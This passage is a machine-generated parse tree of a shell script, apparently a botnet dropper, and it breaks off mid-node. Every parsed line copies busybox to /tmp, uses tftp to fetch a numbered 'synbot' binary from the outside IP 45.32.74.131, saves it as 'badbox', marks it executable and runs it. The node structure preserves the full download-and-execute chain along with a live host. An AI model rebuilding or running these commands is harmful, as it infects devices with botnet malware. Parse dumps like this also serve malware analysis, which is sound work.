CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 190), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 143), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 121), word='45.32.74.131'),
    WordNode(lineno=4, pos=(122, 124), word='-c'),
    WordNode(lineno=4, pos=(125, 128), word='get'),
    WordNode(lineno=4, pos=(129, 143), word='synbot.retard0'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(143, 144)),
  CommandNode(lineno=4, pos=(144, 170), parts=[
    WordNode(lineno=4, pos=(144, 147), word='cat'),
    WordNode(lineno=4, pos=(148, 162), word='synbot.retard0'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(164, 170), word='badbox'), pos=(163, 170), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(170, 171)),
  CommandNode(lineno=4, pos=(171, 181), parts=[
    WordNode(lineno=4, pos=(171, 176), word='chmod'),
    WordNode(lineno=4, pos=(177, 179), word='+x'),
    WordNode(lineno=4, pos=(180, 181), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(181, 182)),
  CommandNode(lineno=4, pos=(182, 190), parts=[
    WordNode(lineno=4, pos=(182, 190), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(191, 332), parts=[
  CommandNode(lineno=5, pos=(191, 198), parts=[
    WordNode(lineno=5, pos=(191, 193), word='cd'),
    WordNode(lineno=5, pos=(194, 198), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(199, 201)),
  CommandNode(lineno=5, pos=(202, 213), parts=[
    WordNode(lineno=5, pos=(202, 204), word='cd'),
    WordNode(lineno=5, pos=(205, 213), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(214, 216)),
  CommandNode(lineno=5, pos=(217, 224), parts=[
    WordNode(lineno=5, pos=(217, 219), word='cd'),
    WordNode(lineno=5, pos=(220, 224), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(225, 227)),
  CommandNode(lineno=5, pos=(228, 236), parts=[
    WordNode(lineno=5, pos=(228, 230), word='cd'),
    WordNode(lineno=5, pos=(231, 236), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(237, 239)),
  CommandNode(lineno=5, pos=(240, 244), parts=[
    WordNode(lineno=5, pos=(240, 242), word='cd'),
    WordNode(lineno=5, pos=(243, 244), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(244, 245)),
  CommandNode(lineno=5, pos=(246, 285), parts=[
    WordNode(lineno=5, pos=(246, 250), word='tftp'),
    WordNode(lineno=5, pos=(251, 263), word='45.32.74.131'),
    WordNode(lineno=5, pos=(264, 266), word='-c'),
    WordNode(lineno=5, pos=(267, 270), word='get'),
    WordNode(lineno=5, pos=(271, 285), word='synbot.retard1'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(285, 286)),
  CommandNode(lineno=5, pos=(286, 312), parts=[
    WordNode(lineno=5, pos=(286, 289), word='cat'),
    WordNode(lineno=5, pos=(290, 304), word='synbot.retard1'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(306, 312), word='badbox'), pos=(305, 312), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(312, 313)),
  CommandNode(lineno=5, pos=(313, 323), parts=[
    WordNode(lineno=5, pos=(313, 318), word='chmod'),
    WordNode(lineno=5, pos=(319, 321), word='+x'),
    WordNode(lineno=5, pos=(322, 323), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(323, 324)),
  CommandNode(lineno=5, pos=(324, 332), parts=[
    WordNode(lineno=5, pos=(324, 332), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(333, 474), parts=[
  CommandNode(lineno=6, pos=(333, 340), parts=[
    WordNode(lineno=6, pos=(333, 335), word='cd'),
    WordNode(lineno=6, pos=(336, 340), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(341, 343)),
  CommandNode(lineno=6, pos=(344, 355), parts=[
    WordNode(lineno=6, pos=(344, 346), word='cd'),
    WordNode(lineno=6, pos=(347, 355), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(356, 358)),
  CommandNode(lineno=6, pos=(359, 366), parts=[
    WordNode(lineno=6, pos=(359, 361), word='cd'),
    WordNode(lineno=6, pos=(362, 366), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(367, 369)),
  CommandNode(lineno=6, pos=(370, 378), parts=[
    WordNode(lineno=6, pos=(370, 372), word='cd'),
    WordNode(lineno=6, pos=(373, 378), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(379, 381)),
  CommandNode(lineno=6, pos=(382, 386), parts=[
    WordNode(lineno=6, pos=(382, 384), word='cd'),
    WordNode(lineno=6, pos=(385, 386), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(386, 387)),
  CommandNode(lineno=6, pos=(388, 427), parts=[
    WordNode(lineno=6, pos=(388, 392), word='tftp'),
    WordNode(lineno=6, pos=(393, 405), word='45.32.74.131'),
    WordNode(lineno=6, pos=(406, 408), word='-c'),
    WordNode(lineno=6, pos=(409, 412), word='get'),
    WordNode(lineno=6, pos=(413, 427), word='synbot.retard2'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(427, 428)),
  CommandNode(lineno=6, pos=(428, 454), parts=[
    WordNode(lineno=6, pos=(428, 431), word='cat'),
    WordNode(lineno=6, pos=(432, 446), word='synbot.retard2'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(448, 454), word='badbox'), pos=(447, 454), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(454, 455)),
  CommandNode(lineno=6, pos=(455, 465), parts=[
    WordNode(lineno=6, pos=(455, 460), word='chmod'),
    WordNode(lineno=6, pos=(461, 463), word='+x'),
    WordNode(lineno=6, pos=(464, 465), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(465, 466)),
  CommandNode(lineno=6, pos=(466, 474), parts=[
    WordNode(lineno=6, pos=(466, 474), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(475, 616), parts=[
  CommandNode(lineno=7, pos=(475, 482), parts=[
    WordNode(lineno=7, pos=(475, 477), word='cd'),
    WordNode(lineno=7, pos=(478, 482), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(483, 485)),
  CommandNode(lineno=7, pos=(486, 497), parts=[
    WordNode(lineno=7, pos=(486, 488), word='cd'),
    WordNode(lineno=7, pos=(489, 497), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(498, 500)),
  CommandNode(lineno=7, pos=(501, 508), parts=[
    WordNode(lineno=7, pos=(501, 503), word='cd'),
    WordNode(lineno=7, pos=(504, 508), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(509, 511)),
  CommandNode(lineno=7, pos=(512, 520), parts=[
    WordNode(lineno=7, pos=(512, 514), word='cd'),
    WordNode(lineno=7, pos=(515, 520), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(521, 523)),
  CommandNode(lineno=7, pos=(524, 528), parts=[
    WordNode(lineno=7, pos=(524, 526), word='cd'),
    WordNode(lineno=7, pos=(527, 528), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(528, 529)),
  CommandNode(lineno=7, pos=(530, 569), parts=[
    WordNode(lineno=7, pos=(530, 534), word='tftp'),
    WordNode(lineno=7, pos=(535, 547), word='45.32.74.131'),
    WordNode(lineno=7, pos=(548, 550), word='-c'),
    WordNode(lineno=7, pos=(551, 554), word='get'),
    WordNode(lineno=7, pos=(555, 569), word='synbot.retard3'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(569, 570)),
  CommandNode(lineno=7, pos=(570, 596), parts=[
    WordNode(lineno=7, pos=(570, 573), word='cat'),
    WordNode(lineno=7, pos=(574, 588), word='synbot.retard3'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(590, 596), word='badbox'), pos=(589, 596), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(596, 597)),
  CommandNode(lineno=7, pos=(597, 607), parts=[
    WordNode(lineno=7, pos=(597, 602), word='chmod'),
    WordNode(lineno=7, pos=(603, 605), word='+x'),
    WordNode(lineno=7, pos=(606, 607), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(607, 608)),
  CommandNode(lineno=7, pos=(608, 616), parts=[
    WordNode(lineno=7, pos=(608, 616), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(617, 758), parts=[
  CommandNode(lineno=8, pos=(617, 624), parts=[
    WordNode(lineno=8, pos=(617, 619), word='cd'),
    WordNode(lineno=8, pos=(620, 624), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(625, 627)),
  CommandNode(lineno=8, pos=(628, 639), parts=[
    WordNode(lineno=8, pos=(628, 630), word='cd'),
    WordNode(lineno=8, pos=(631, 639), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(640, 642)),
  CommandNode(lineno=8, pos=(643, 650), parts=[
    WordNode(lineno=8, pos=(643, 645), word='cd'),
    WordNode(lineno=8, pos=(646, 650), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(651, 653)),
  CommandNode(lineno=8, pos=(654, 662), parts=[
    WordNode(lineno=8, pos=(654, 656), word='cd'),
    WordNode(lineno=8, pos=(657, 662), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(663, 665)),
  CommandNode(lineno=8, pos=(666, 670), parts=[
    WordNode(lineno=8, pos=(666, 668), word='cd'),
    WordNode(lineno=8, pos=(669, 670), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(670, 671)),
  CommandNode(lineno=8, pos=(672, 711), parts=[
    WordNode(lineno=8, pos=(672, 676), word='tftp'),
    WordNode(lineno=8, pos=(677, 689), word='45.32.74.131'),
    WordNode(lineno=8, pos=(690, 692), word='-c'),
    WordNode(lineno=8, pos=(693, 696), word='get'),
    WordNode(lineno=8, pos=(697, 711), word='synbot.retard4'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(711, 712)),
  CommandNode(lineno=8, pos=(712, 738), parts=[
    WordNode(lineno=8, pos=(712, 715), word='cat'),
    WordNode(lineno=8, pos=(716, 730), word='synbot.retard4'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(732, 738), word='badbox'), pos=(731, 738), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(738, 739)),
  CommandNode(lineno=8, pos=(739, 749), parts=[
    WordNode(lineno=8, pos=(739, 744), word='chmod'),
    WordNode(lineno=8, pos=(745, 747), word='+x'),
    WordNode(lineno=8, pos=(748, 749), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(749, 750)),
  CommandNode(lineno=8, pos=(750, 758), parts=[
    WordNode(lineno=8, pos=(750, 758), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(759, 900), parts=[
  CommandNode(lineno=9, pos=(759, 766), parts=[
    WordNode(lineno=9, pos=(759, 761), word='cd'),
    WordNode(lineno=9, pos=(762, 766), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(767, 769)),
  CommandNode(lineno=9, pos=(770, 781), parts=[
    WordNode(lineno=9, pos=(770, 772), word='cd'),
    WordNode(lineno=9, pos=(773, 781), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(782, 784)),
  CommandNode(lineno=9, pos=(785, 792), parts=[
    WordNode(lineno=9, pos=(785, 787), word='cd'),
    WordNode(lineno=9, pos=(788, 792), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(793, 795)),
  CommandNode(lineno=9, pos=(796, 804), parts=[
    WordNode(lineno=9, pos=(796, 798), word='cd'),
    WordNode(lineno=9, pos=(799, 804), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(805, 807)),
  CommandNode(lineno=9, pos=(808, 812), parts=[
    WordNode(lineno=9, pos=(808, 810), word='cd'),
    WordNode(lineno=9, pos=(811, 812), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(812, 813)),
  CommandNode(lineno=9, pos=(814, 853), parts=[
    WordNode(lineno=9, pos=(814, 818), word='tftp'),
    WordNode(lineno=9, pos=(819, 831), word='45.32.74.131'),
    WordNode(lineno=9, pos=(832, 834), word='-c'),
    WordNode(lineno=9, pos=(835, 838), word='get'),
    WordNode(lineno=9, pos=(839, 853), word='synbot.retard5'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(853, 854)),
  CommandNode(lineno=9, pos=(854, 880), parts=[
    WordNode(lineno=9, pos=(854, 857), word='cat'),
    WordNode(lineno=9, pos=(858, 872), word='synbot.retard5'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(874, 880), word='badbox'), pos=(873, 880), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(880, 881)),
  CommandNode(lineno=9, pos=(881, 891), parts=[
    WordNode(lineno=9, pos=(881, 886), word='chmod'),
    WordNode(lineno=9, pos=(887, 889), word='+x'),
    WordNode(lineno=9, pos=(890, 891), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(891, 892)),
  CommandNode(lineno=9, pos=(892, 900), parts=[
    WordNode(lineno=9, pos=(892, 900), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(901, 1042), parts=[
  CommandNode(lineno=10, pos=(901, 908), parts=[
    WordNode(lineno=10, pos=(901, 903), word='cd'),
    WordNode(lineno=10, pos=(904, 908), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(909, 911)),
  CommandNode(lineno=10, pos=(912, 923), parts=[
    WordNode(lineno=10, pos=(912, 914), word='cd'),
    WordNode(lineno=10, pos=(915, 923), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(924, 926)),
  CommandNode(lineno=10, pos=(927, 934), parts=[
    WordNode(lineno=10, pos=(927, 929), word='cd'),
    WordNode(lineno=10, pos=(930, 934), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(935, 937)),
  CommandNode(lineno=10, pos=(938, 946), parts=[
    WordNode(lineno=10, pos=(938, 940), word='cd'),
    WordNode(lineno=10, pos=(941, 946), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(947, 949)),
  CommandNode(lineno=10, pos=(950, 954), parts=[
    WordNode(lineno=10, pos=(950, 952), word='cd'),
    WordNode(lineno=10, pos=(953, 954), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(954, 955)),
  CommandNode(lineno=10, pos=(956, 995), parts=[
    WordNode(lineno=10, pos=(956, 960), word='tftp'),
    WordNode(lineno=10, pos=(961, 973), word='45.32.74.131'),
    WordNode(lineno=10, pos=(974, 976), word='-c'),
    WordNode(lineno=10, pos=(977, 980), word='get'),
    WordNode(lineno=10, pos=(981, 995), word='synbot.retard6'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(995, 996)),
  CommandNode(lineno=10, pos=(996, 1022), parts=[
    WordNode(lineno=10, pos=(996, 999), word='cat'),
    WordNode(lineno=10, pos=(1000, 1014), word='synbot.retard6'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(1016, 1022), word='badbox'), pos=(1015, 1022), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1022, 1023)),
  CommandNode(lineno=10, pos=(1023, 1033), parts=[
    WordNode(lineno=10, pos=(1023, 1028), word='chmod'),
    WordNode(lineno=10, pos=(1029, 1031), word='+x'),
    WordNode(lineno=10, pos=(1032, 1033), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1033, 1034)),
  CommandNode(lineno=10, pos=(1034, 1042), parts=[
    WordNode(lineno=10, pos=(1034, 1042), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(1043, 1184), parts=[
  CommandNode(lineno=11, pos=(1043, 1050), parts=[
    WordNode(lineno=11, pos=(1043, 1045), word='cd'),
    WordNode(lineno=11, pos=(1046, 1050), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1051, 1053)),
  CommandNode(lineno=11, pos=(1054, 1065), parts=[
    WordNode(lineno=11, pos=(1054, 1056), word='cd'),
    WordNode(lineno=11, pos=(1057, 1065), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1066, 1068)),
  CommandNode(lineno=11, pos=(1069, 1076), parts=[
    WordNode(lineno=11, pos=(1069, 1071), word='cd'),
    WordNode(lineno=11, pos=(1072, 1076), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1077, 1079)),
  CommandNode(lineno=11, pos=(1080, 1088), parts=[
    WordNode(lineno=11, pos=(1080, 1082), word='cd'),
    WordNode(lineno=11, pos=(1083, 1088), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1089, 1091)),
  CommandNode(lineno=11, pos=(1092, 1096), parts=[
    WordNode(lineno=11, pos=(1092, 1094), word='cd'),
    WordNode(lineno=11, pos=(1095, 1096), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1096, 1097)),
  CommandNode(lineno=11, pos=(1098, 1137), parts=[
    WordNode(lineno=11, pos=(1098, 1102), word='tftp'),
    WordNode(lineno=11, pos=(1103, 1115), word='45.32.74.131'),
    WordNode(lineno=11, pos=(1116, 1118), word='-c'),
    WordNode(lineno=11, pos=(1119, 1122), word='get'),
    WordNode(lineno=11, pos=(1123, 1137), word='synbot.retard7'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1137, 1138)),
  CommandNode(lineno=11, pos=(1138, 1164), parts=[
    WordNode(lineno=11, pos=(1138, 1141), word='cat'),
    WordNode(lineno=11, pos=(1142, 1156), word='synbot.retard7'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1158, 1164), word='badbox'), pos=(1157, 1164), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1164, 1165)),
  CommandNode(lineno=11, pos=(1165, 1175), parts=[
    WordNode(lineno=11, pos=(1165, 1170), word='chmod'),
    WordNode(lineno=11, pos=(1171, 1173), word='+x'),
    WordNode(lineno=11, pos=(1174, 1175), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1175, 1176)),
  CommandNode(lineno=11, pos=(1176, 1184), parts=[
    WordNode(lineno=11, pos=(1176, 1184), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1185, 1326), parts=[
  CommandNode(lineno=12, pos=(1185, 1192), parts=[
    WordNode(lineno=12, pos=(1185, 1187), word='cd'),
    WordNode(lineno=12, pos=(1188, 1192), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1193, 1195)),
  CommandNode(lineno=12, pos=(1196, 1207), parts=[
    WordNode(lineno=12, pos=(1196, 1198), word='cd'),
    WordNode(lineno=12, pos=(1199, 1207), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1208, 1210)),
  CommandNode(lineno=12, pos=(1211, 1218), parts=[
    WordNode(lineno=12, pos=(1211, 1213), word='cd'),
    WordNode(lineno=12, pos=(1214, 1218), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1219, 1221)),
  CommandNode(lineno=12, pos=(1222, 1230), parts=[
    WordNode(lineno=12, pos=(1222, 1224), word='cd'),
    WordNode(lineno=12, pos=(1225, 1230), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1231, 1233)),
  CommandNode(lineno=12, pos=(1234, 1238), parts=[
    WordNode(lineno=12, pos=(1234, 1236), word='cd'),
    WordNode(lineno=12, pos=(1237, 1238), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1238, 1239)),
  CommandNode(lineno=12, pos=(1240, 1279), parts=[
    WordNode(lineno=12, pos=(1240, 1244), word='tftp'),
    WordNode(lineno=12, pos=(1245, 1257), word='45.32.74.131'),
    WordNode(lineno=12, pos=(1258, 1260), word='-c'),
    WordNode(lineno=12, pos=(1261, 1264), word='get'),
    WordNode(lineno=12, pos=(1265, 1279), word='synbot.retard8'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1279, 1280)),
  CommandNode(lineno=12, pos=(1280, 1306), parts=[
    WordNode(lineno=12, pos=(1280, 1283), word='cat'),
    WordNode(lineno=12, pos=(1284, 1298), word='synbot.retard8'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1300, 1306), word='badbox'), pos=(1299, 1306), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1306, 1307)),
  CommandNode(lineno=12, pos=(1307, 1317), parts=[
    WordNode(lineno=12, pos=(1307, 1312), word='chmod'),
    WordNode(lineno=12, pos=(1313, 1315), word='+x'),
    WordNode(lineno=12, pos=(1316, 1317), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1317, 1318)),
  CommandNode(lineno=12, pos=(1318, 1326), parts=[
    WordNode(lineno=12, pos=(1318, 1326), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1327, 1468), parts=[
  CommandNode(lineno=13, pos=(1327, 1334), parts=[
    WordNode(lineno=13, pos=(1327, 1329), word='cd'),
    WordNode(lineno=13, pos=(1330, 1334), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1335, 1337)),
  CommandNode(lineno=13, pos=(1338, 1349), parts=[
    WordNode(lineno=13, pos=(1338, 1340), word='cd'),
    WordNode(lineno=13, pos=(1341, 1349), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1350, 1352)),
  CommandNode(lineno=13, pos=(1353, 1360), parts=[
    WordNode(lineno=13, pos=(1353, 1355), word='cd'),
    WordNode(lineno=13, pos=(1356, 1360), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1361, 1363)),
  CommandNode(lineno=13, pos=(1364, 1372), parts=[
    WordNode(lineno=13, pos=(1364, 1366), word='cd'),
    WordNode(lineno=13, pos=(1367, 1372), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1373, 1375)),
  CommandNode(lineno=13, pos=(1376, 1380), parts=[
    WordNode(lineno=13, pos=(1376, 1378), word='cd'),
    WordNode(lineno=13, pos=(1379, 1380), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1380, 1381)),
  CommandNode(lineno=13, pos=(1382, 1421), parts=[
    WordNode(lineno=13, pos=(1382, 1386), word='tftp'),
    WordNode(lineno=13, pos=(1387, 1399), word='45.32.74.131'),
    WordNode(lineno=13, pos=(1400, 1402), word='-c'),
    WordNode(lineno=13, pos=(1403, 1406), word='get'),
    WordNode(lineno=13, pos=(1407, 1421), word='synbot.retard9'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1421, 1422)),
  CommandNode(lineno=13, pos=(1422, 1448), parts=[
    WordNode(lineno=13, pos=(1422, 1425), word='cat'),
    WordNode(lineno=13, pos=(1426, 1440), word='synbot.retard9'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1442, 1448), word='badbox'), pos=(1441, 1448), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1448, 1449)),
  CommandNode(lineno=13, pos=(1449, 1459), parts=[
    WordNode(lineno=13, pos=(1449, 1454), word='chmod'),
    WordNode(lineno=13, pos=(1455, 1457), word='+x'),
    WordNode(lineno=13, pos=(1458, 1459), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1459, 1460)),
  CommandNode(lineno=13, pos=(1460, 1468), parts=[
    WordNode(lineno=13, pos=(1460, 1468), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1469, 1612), parts=[
  CommandNode(lineno=14, pos=(1469, 1476), parts=[
    WordNode(lineno=14, pos=(1469, 1471), word='cd'),
    WordNode(lineno=14, pos=(1472, 1476), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1477, 1479)),
  CommandNode(lineno=14, pos=(1480, 1491), parts=[
    WordNode(lineno=14, pos=(1480, 1482), word='cd'),
    WordNode(lineno=14, pos=(1483, 1491), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1492, 1494)),
  CommandNode(lineno=14, pos=(1495, 1502), parts=[
    WordNode(lineno=14, pos=(1495, 1497), word='cd'),
    WordNode(lineno=14, pos=(1498, 1502), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1503, 1505)),
  CommandNode(lineno=14, pos=(1506, 1514), parts=[
    WordNode(lineno=14, pos=(1506, 1508), word='cd'),
    WordNode(lineno=14, pos=(1509, 1514), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1515, 1517)),
  CommandNode(lineno=14, pos=(1518, 1522), parts=[
    WordNode(lineno=14, pos=(1518, 1520), word='cd'),
    WordNode(lineno=14, pos=(1521, 1522), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1522, 1523)),
  CommandNode(lineno=14, pos=(1524, 1564), parts=[
    WordNode(lineno=14, pos=(1524, 1528), word='tftp'),
    WordNode(lineno=14, pos=(1529, 1541), word='45.32.74.131'),
    WordNode(lineno=14, pos=(1542, 1544), word='-c'),
    WordNode(lineno=14, pos=(1545, 1548), word='get'),
    WordNode(lineno=14, pos=(1549, 1564), word='synbot.retard10'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1564, 1565)),
  CommandNode(lineno=14, pos=(1565, 1592), parts=[
    WordNode(lineno=14, pos=(1565, 1568), word='cat'),
    WordNode(lineno=14, pos=(1569, 1584), word='synbot.retard10'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1586, 1592), word='badbox'), pos=(1585, 1592), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1592, 1593)),
  CommandNode(lineno=14, pos=(1593, 1603), parts=[
    WordNode(lineno=14, pos=(1593, 1598), word='chmod'),
    WordNode(lineno=14, pos=(1599, 1601), word='+x'),
    WordNode(lineno=14, pos=(1602, 1603), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1603, 1604)),
  CommandNode(lineno=14, pos=(1604, 1612), parts=[
    WordNode(lineno=14, pos=(1604, 1612), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1613, 1756), parts=[
  CommandNode(lineno=15, pos=(1613, 1620), parts=[
    WordNode(lineno=15, pos=(1613, 1615), word='cd'),
    WordNode(lineno=15, pos=(1616, 1620), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1621, 1623)),
  CommandNode(lineno=15, pos=(1624, 1635), parts=[
    WordNode(lineno=15, pos=(1624, 1626), word='cd'),
    WordNode(lineno=15, pos=(1627, 1635), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1636, 1638)),
  CommandNode(lineno=15, pos=(1639, 1646), parts=[
    WordNode(lineno=15, pos=(1639, 1641), word='cd'),
    WordNode(lineno=15, pos=(1642, 1646), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1647, 1649)),
  CommandNode(lineno=15, pos=(1650, 1658), parts=[
    WordNode(lineno=15, pos=(1650, 1652), word='cd'),
    WordNode(lineno=15, pos=(1653, 1658), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1659, 1661)),
  CommandNode(lineno=15, pos=(1662, 1666), parts=[
    WordNode(lineno=15, pos=(1662, 1664), word='cd'),
    WordNode(lineno=15, pos=(1665, 1666), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1666, 1667)),
  CommandNode(lineno=15, pos=(1668, 1708), parts=[
    WordNode(lineno=15, pos=(1668, 1672), word='tftp'),
    WordNode(lineno=15, pos=(1673, 1685), word='45.32.74.131'),
    WordNode(lineno=15, pos=(1686, 1688), word='-c'),
    WordNode(lineno=15, pos=(1689, 1692), word='get'),
    WordNode(lineno=15, pos=(1693, 1708), word='synbot.retard11'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1708, 1709)),
  CommandNode(lineno=15, pos=(1709, 1736), parts=[
    WordNode(lineno=15, pos=(1709, 1712), word='cat'),
    WordNode(lineno=15, pos=(1713, 1728), word='synbot.retard11'),
    RedirectNode(lineno=15, output=
